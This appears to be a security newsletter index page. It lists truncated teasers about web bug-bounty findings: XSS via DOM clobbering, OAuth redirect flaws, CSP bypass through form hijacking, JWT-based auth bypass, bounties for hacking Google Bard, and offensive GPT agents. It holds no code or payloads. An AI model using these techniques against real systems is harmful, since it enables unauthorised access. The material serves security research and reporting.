This XSS by Brett Buerhaus is amazing! It includes multiple steps and ends with DOM Clobbering. It is a technique that I know better from CTF challenges and it’s always satisfying to see something like this on a real-world target....
#73
Oauth redirect URI research paper
A few weeks ago, I had to dive a bit deep into the Oauth protocol and into how different providers actually validate the redirect_uri. I even thought if I would do it on a bigger scale, that could be a bigger research and a good talk. But I see that this paper did a...
You can not simply publicly access private secure links, can you?
Whenever I’m sharing something via a URL, I wonder if it will get indexed by URL analysis tools, thus becoming public to anyone. Unfortunately, from this blogpost, we can learn that, unfortunately, there’s a great chance they are. It’s quite hard to say which tool...
They Hacked Google A.I. for $50,000
Joseph "rez0" Thacker, Justin "Rhynorater" Gardner and I, Roni "Lupin" Carta collaborated on hacking Google Bard which resulted in $50,000 of bounties. They have interesting bugs as well like an IDOR that allowed you to describe someone’s...
Using form hijacking to bypass CSP
Password managers are great. It’s the first thing I recommend to my non-tech friends. Apart from being more secure than reusing passwords, it’s also very convenient to have your password filled in by the browser extension. However, the auto-fill mechanism also comes...
How NOT to Train Your Hack Bot: Dos and Don’ts of Building Offensive GPTs
Will AI hacking agents replace us, hackers? This is the question I’ve been asked a few times already. It’s hard not to think about it. Certainly, I did. So this week, I watched a Black Hat talk about Offensive GPTs to see what was presented at Black Hat about the...
ALB auth bypass by using untrusted JWT token
Usually, JWT tokens do not contain information about the signing secret used. In most cases, a web application uses a single signing secret that is not included in the JWT header. However, as per specification, JWT tokens are much more complex. Even though developers...